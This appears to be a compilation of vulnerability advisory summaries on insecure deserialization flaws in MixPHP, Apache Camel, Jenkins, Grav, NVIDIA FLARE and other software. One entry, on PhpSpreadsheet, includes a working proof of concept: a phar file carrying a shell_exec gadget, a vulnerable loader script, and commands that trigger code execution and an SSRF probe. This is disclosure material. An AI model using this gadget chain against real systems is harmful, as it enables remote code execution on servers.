Arbitrary code execution in MixPHP Framework 2.x through 2.2.17 allows local attackers to execute malicious PHP closures via unauthenticated TCP connections to the sync-invoke server. The vulnerability stems from unsafe deserialization of untrusted data on localhost-bound port 127.0.0.1, where Server.php directly passes socket data to Opis\Closure\unserialize() and executes the result without authentication or signature verification. Exploitation requires local network access or SSRF capability against the application server. No public exploit code identified at time of analysis, but the attack mechanism is straightforward for attackers with PHP deserialization knowledge.

Remote unauthenticated code execution in MixPHP Framework 2.x through 2.2.17 allows attackers to execute arbitrary PHP code by injecting malicious serialized objects into Redis-backed session or cache storage. The framework's RedisHandler directly deserializes untrusted data from Redis using PHP's unserialize() function without validation. CVSS 9.8 with network vector, low complexity, and no privileges required. EPSS and KEV status not provided; SSVC framework marks this as automatable with total technical impact, indicating high exploitability despite no confirmed active exploitation at time of analysis.

Remote code execution in MixPHP Framework 2.x through 2.2.17 allows unauthenticated network attackers to execute arbitrary code via unsafe deserialization. The FileHandler class processes session and cache data using PHP's unserialize() on filesystem-sourced content without validation, enabling object injection attacks. CVSS 9.8 critical severity with network attack vector and no privileges required. SSVC assessment confirms automatable exploitation with total technical impact. No active exploitation confirmed at time of analysis (not in CISA KEV), but publicly available proof-of-concept exists (GitHub gist reference).

Client-side remote code execution affects MixPHP Framework 2.x through 2.2.17 when sync-invoke clients connect to attacker-controlled servers. The vulnerability enables malicious servers to execute arbitrary code on connecting clients through unsafe deserialization of server responses (CWE-502). EPSS data unavailable, but SSVC indicates no confirmed exploitation and non-automatable attack complexity aligns with CVSS AC:H rating. Primary risk exists in scenarios where MixPHP clients connect to untrusted external services or where server infrastructure could be compromised.

Remote code execution in Hyperledger fabric-sdk-java (all versions 1.0.0 through 2.2.26) allows unauthenticated attackers to execute arbitrary commands via malicious serialized Java objects. The deprecated SDK's Channel.java class deserializes untrusted byte arrays without input filtering in readObject() and deSerializeChannel() methods, enabling classic Java gadget chain exploitation. Publicly available exploit code exists (ysoserial toolkit), and exploitation requires only that an application accept Channel serialization data from attacker-controlled sources such as compromised files, external APIs, or injected parameters. EPSS data unavailable; not listed in CISA KEV. Vendor has published GHSA advisory but provides no patch-remediation requires migration to the replacement fabric-gateway SDK.

{ public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

Jenkins Matrix Authorization Strategy Plugin 2.0-beta-1 through 3.2.9 (both inclusive) invokes parameterless constructors of classes specified in configuration when deserializing inheritance strategies, without restricting the classes that can be instantiated, allowing attackers with Item/Configure permission to instantiate arbitrary types, which may lead to information disclosure or other impacts depending on the classes available on the classpath.

A vulnerability was found in Grav CMS up to 1.7.49.5/2.0.0-beta.1. Affected by this vulnerability is the function FileCache::doGet of the file system/src/Grav/Framework/Cache/Adapter/FileCache.php of the component Cache Value Handler. The manipulation results in deserialization. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. Upgrading to version 2.0.0-beta.2 addresses this issue. The patch is identified as c66dfeb5f. The affected component should be upgraded.

Remote code execution in NVIDIA FLARE SDK allows authenticated attackers to execute arbitrary code by sending maliciously crafted FOBS-encoded messages that exploit unsafe deserialization in the FOBS component. The vulnerability affects federated learning deployments where NVIDIA FLARE SDK processes messages from low-privileged authenticated users, enabling complete system compromise with high impact to confidentiality, integrity, and availability. No active exploitation confirmed (not in CISA KEV) and public exploit status unknown at time of analysis.

Remote code execution in StellarGroup HPX 1.11.0 allows unauthenticated attackers to execute arbitrary code through insecure deserialization of untrusted input. Publicly available exploit code exists (GitHub Gist POC) with CISA SSVC classifying this as automatable with total technical impact, though EPSS indicates only 2% probability of exploitation in the wild. The CWE-502 vulnerability enables complete system compromise when untrusted data is deserialized under specific deployment conditions not detailed in the description.

Insecure deserialization in Cista v0.15 and below allows remote unauthenticated attackers to leak stack and heap addresses through reference tampering in the cista::raw namespace, potentially defeating ASLR protections. The vulnerability arises from insufficient validation of pointer-like objects during deserialization, enabling attackers to observe deserialized values and extract memory layout information for subsequent exploitation.

The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1.

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. The JIRA ticket: https://issues.apache.org/jira/browse/CAMEL-23322 refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.